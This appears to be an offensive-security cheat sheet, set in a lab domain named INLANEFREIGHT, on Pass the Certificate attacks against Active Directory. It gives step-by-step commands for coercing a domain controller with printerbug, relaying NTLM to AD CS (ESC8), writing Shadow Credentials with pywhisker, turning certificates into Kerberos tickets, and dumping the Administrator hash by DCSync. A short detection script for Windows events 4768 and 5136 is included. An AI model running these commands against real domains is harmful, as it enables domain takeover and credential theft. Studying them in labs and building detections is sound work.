# Pass the Certificate

Use a certificate instead of a password to request a Kerberos TGT (PKINIT).

The certificate usually comes from AD CS abuse (such as ESC8) or from Shadow Credentials.

### Core ideas

| Term                     | Meaning                                                                     |
| ------------------------ | --------------------------------------------------------------------------- |
| **PKINIT**               | Kerberos extension that uses a certificate for AS-REQ authentication        |
| **Pass the Certificate** | Use a certificate to obtain a TGT, then continue with normal Kerberos abuse |
| **ESC8**                 | NTLM relay to the AD CS web enrollment endpoint                             |
| **Shadow Credentials**   | Add your public key to a victim's `msDS-KeyCredentialLink` attribute        |

***

### Attack path 1 — ESC8

#### Flow

```
ntlmrelayx listening
    ↓
printerbug coerces DC01
    ↓
relay NTLM to /certsrv
    ↓
DC01$.pfx issued
    ↓
gettgtpkinit.py → /tmp/dc.ccache
    ↓
KRB5CCNAME → secretsdump → Administrator NTLM
```

#### Step 1 — Start NTLM relay

```bash
impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp \
  --adcs -smb2support --template KerberosAuthentication
```

{% hint style="info" %}
`--template` sets the certificate template. Enumerate valid templates with `certipy`.
{% endhint %}

#### Step 2 — Coerce DC authentication

```bash
python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"password"@10.129.234.109 10.10.16.12
```

This coerces `DC01` into authenticating to the attacker host, where `ntlmrelayx` relays the NTLM authentication to the CA.

This path requires the **Print Spooler** service to be running on the DC.

#### Step 3 — Confirm certificate issuance

Expected `ntlmrelayx` output:

```
[*] Authenticating against http://10.129.234.110 as INLANEFREIGHT/DC01$ SUCCEED
[*] GOT CERTIFICATE! ID 8
[*] Writing PKCS#12 certificate to ./DC01$.pfx
```

#### Step 4 — Set up PKINITtools

```bash
git clone https://github.com/dirkjanm/PKINITtools.git && cd PKINITtools
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```

If you hit `Error detecting the version of libcrypto`, run:

```bash
pip3 install -I git+https://github.com/wbond/oscrypto.git
```

#### Step 5 — Convert the certificate into a TGT

```bash
python3 gettgtpkinit.py \
  -cert-pfx ../DC01\$.pfx \
  -dc-ip 10.129.234.109 \
  'inlanefreight.local/dc01$' /tmp/dc.ccache
```

#### Step 6 — DCSync as `DC01$`

```bash
export KRB5CCNAME=/tmp/dc.ccache

impacket-secretsdump -k -no-pass \
  -dc-ip 10.129.234.109 \
  -just-dc-user Administrator \
  'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
```

***

### Attack path 2 — Shadow Credentials

#### Flow

```
BloodHound shows AddKeyCredentialLink
    ↓
pywhisker adds our key to the victim
    ↓
.pfx file and password generated
    ↓
gettgtpkinit.py → victim.ccache
    ↓
KRB5CCNAME → evil-winrm or smbclient
```

#### Step 1 — Add a key credential to the victim

```bash
pywhisker --dc-ip 10.129.234.109 \
  -d INLANEFREIGHT.LOCAL \
  -u wwhite -p 'password' \
  --target jpinkman \
  --action add
```

Expected output:

```
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] PFX exportiert nach: eFUVVTPf.pfx
[i] Passwort für PFX: bmRH4LK7UwPrAOfvIx6W
```

Save the generated `.pfx` file and password.

#### Step 2 — Request a TGT as the victim

```bash
python3 gettgtpkinit.py \
  -cert-pfx ../eFUVVTPf.pfx \
  -pfx-pass 'bmRH4LK7UwPrAOfvIx6W' \
  -dc-ip 10.129.234.109 \
  INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache
```

#### Step 3 — Load the ticket and authenticate

```bash
export KRB5CCNAME=/tmp/jpinkman.ccache
klist

# If the victim is in Remote Management Users
evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local
```
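Detection logic for both attack paths on this page, as an added example that is not part of the original page or of any tool it names: event 4768 with Pre-Authentication Type 16 marks a PKINIT TGT request (what `gettgtpkinit.py` produces), and event 5136 adding a value to `msDS-KeyCredentialLink` marks a Shadow Credentials write (what `pywhisker` produces). The events are constructed samples shaped like the EventData of the real events; the IP addresses and the `known_dc_ips` set are assumptions.

```python
"""Flag the two precursors of the attack paths above in Windows Security events:
4768 (TGT requested) with PreAuthType 16 (PA-PK-AS-REQ) means a certificate was
used in the AS-REQ, as gettgtpkinit.py does; 5136 (directory object modified) on
msDS-KeyCredentialLink is the pywhisker write (needs a SACL on the target)."""

PKINIT_PREAUTH = "16"    # PA-PK-AS-REQ: certificate presented in the AS-REQ
KCL_ATTR = "msDS-KeyCredentialLink"
VALUE_ADDED = "%%14674"  # 5136 OperationType resource string for "Value Added"
USERS = "CN=Users,DC=inlanefreight,DC=local"

# Constructed sample events (not real logs); field names follow the EventData
# of the real 4768 and 5136 events, values are made up.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jpinkman", "PreAuthType": "2",
     "IpAddress": "::ffff:10.0.0.50"},                     # normal password pre-auth
    {"EventID": 4768, "TargetUserName": "DC01$", "PreAuthType": PKINIT_PREAUTH,
     "IpAddress": "::ffff:10.0.0.99", "CertIssuerName": "INLANEFREIGHT-CA"},
    {"EventID": 5136, "SubjectUserName": "wwhite", "ObjectDN": "CN=jpinkman," + USERS,
     "AttributeLDAPDisplayName": KCL_ATTR, "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "svc_sync", "ObjectDN": "CN=jpinkman," + USERS,
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
]

def pkinit_tgt(ev, known_dc_ips):
    """4768 where the client proved its identity with a certificate."""
    if ev.get("EventID") != 4768 or ev.get("PreAuthType") != PKINIT_PREAUTH:
        return None
    who, src = ev["TargetUserName"], ev["IpAddress"].replace("::ffff:", "")
    # A machine account using PKINIT from an address that is not a DC is the
    # ESC8 pattern; a user account may just be a legitimate smart-card logon.
    sev = "high" if who.endswith("$") and src not in known_dc_ips else "info"
    return {"type": "pkinit_tgt", "account": who, "source_ip": src,
            "issuer": ev.get("CertIssuerName", ""), "severity": sev}

def keycredential_write(ev):
    """5136 that adds a value to msDS-KeyCredentialLink (Shadow Credentials)."""
    if (ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != KCL_ATTR
            or ev.get("OperationType") != VALUE_ADDED):
        return None
    return {"type": "keycredentiallink_write", "actor": ev["SubjectUserName"],
            "target": ev["ObjectDN"], "severity": "high"}

def triage(events, known_dc_ips=frozenset()):
    findings = []
    for ev in events:
        hit = pkinit_tgt(ev, known_dc_ips) or keycredential_write(ev)
        if hit:
            findings.append(hit)
    return findings
```

Feed `triage` the EventData of real 4768/5136 events with the actual DC addresses in `known_dc_ips`; the `info` findings for user accounts are the baseline of legitimate smart-card logons to tune against.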

***

### Fallback — no PKINIT support

If the DC does not support PKINIT (it lacks a certificate with the required EKU), use **PassTheCert** instead.

PassTheCert authenticates to **LDAPS** with the certificate directly, without requesting a Kerberos ticket. From that LDAP session it can:

* change passwords
* grant DCSync rights

Tool: [PassTheCert](https://github.com/AlmondOffSec/PassTheCert)

***

### Quick reference

```bash
# NTLM relay
impacket-ntlmrelayx -t http://<CA_IP>/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication
python3 printerbug.py DOMAIN/user:"pass"@<DC_IP> <ATTACKER_IP>

# PKINITtools setup
git clone https://github.com/dirkjanm/PKINITtools.git && cd PKINITtools
python3 -m venv .venv && source .venv/bin/activate
pip3 install -r requirements.txt
pip3 install -I git+https://github.com/wbond/oscrypto.git

# Certificate → TGT
python3 gettgtpkinit.py -cert-pfx <file.pfx> -dc-ip <DC_IP> 'DOMAIN/account$' /tmp/out.ccache
python3 gettgtpkinit.py -cert-pfx <file.pfx> -pfx-pass '<pass>' -dc-ip <DC_IP> DOMAIN/user /tmp/out.ccache

# Use the ticket
export KRB5CCNAME=/tmp/out.ccache
klist

# DCSync
impacket-secretsdump -k -no-pass -dc-ip <DC_IP> -just-dc-user Administrator 'DOMAIN/DC01$'@DC01.DOMAIN

# Shadow Credentials
pywhisker --dc-ip <DC_IP> -d DOMAIN -u <user> -p '<pass>' --target <victim> --action add

# Lateral movement
evil-winrm -i <host> -r <domain>
```

***

### Key takeaways

| Concept                  | Detail                                                               |
| ------------------------ | -------------------------------------------------------------------- |
| **PKINIT**               | Uses a certificate instead of a password for Kerberos authentication |
| **ESC8**                 | Relays NTLM to AD CS and issues a usable certificate                 |
| **Printer Bug**          | Coerces a machine account to authenticate to you                     |
| **Shadow Credentials**   | Writes a public key to `msDS-KeyCredentialLink`                      |
| **AddKeyCredentialLink** | BloodHound edge that shows write access to that attribute            |
| **pywhisker**            | Adds or removes key credentials from a target object                 |
| **gettgtpkinit.py**      | Turns a `.pfx` file into a usable `.ccache` ticket                   |
| **PassTheCert**          | Useful when PKINIT is unavailable                                    |
